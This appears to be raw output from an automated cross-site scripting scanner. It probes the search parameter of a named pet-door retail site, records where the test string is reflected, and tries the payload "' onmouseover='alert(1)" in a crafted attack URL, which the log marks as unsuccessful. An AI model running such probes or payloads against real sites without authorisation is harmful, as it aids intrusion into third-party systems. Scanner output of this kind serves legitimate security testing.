https://www.petdoors.com/

GET Params:[1]
['q']
_______________________________________________________________________________________________________
https://www.petdoors.com/catalogsearch/result/?q=(uvw"xyz'yxz</zxy

----------------------------------------------------------------------------------
Attribute Context: [1]
<input
id="search" onfocus="this.value == 'Search - Type what you are looking for here' ? this.value = '' : ''" onblur="this.value == '' ? this.value = 'Search - Type what you are looking for here' : ''" type="text" name="q" value="(uvw%22xyz'yxz%3C/zxy" class="input-text input_xlarge" />

----------------------------------------------------------------------------------
HTML Context: [3]
<title>Search results for: '(uvw%22xyz'yxz%3C/zxy'</title>
<span>Search results for: '(uvw%22xyz'yxz%3C/zxy'</span>
<h1>Search results for '(uvw%22xyz'yxz%3C/zxy'</h1>

----------------------------------------------------------------------------------
Script Context: [0]

----------------------------------------------------------------------------------
URI Context: [0]

----------------------------------------------------------------------------------


ENCODING     Presence	"	'	<	( 
ATTR:		True	True	False	True	False

Attack Payloads for ATTR
["' onmouseover='alert(1)"]

ATTR Attack Url: https://www.petdoors.com/catalogsearch/result/?q=' onmouseover='alert(1)

 ______ UnSuccessful with payload: ' onmouseover='alert(1)

ENCODING     Presence	"	'	<	( 
HTML:		True	True	False	True	False

Attack Payloads for HTML
[]
ENCODING     Presence	"	'	<	( 
HTML:		True	True	False	True	False

Attack Payloads for HTML
[]
ENCODING     Presence	"	'	<	( 
HTML:		True	True	False	True	False

Attack Payloads for HTML
[]
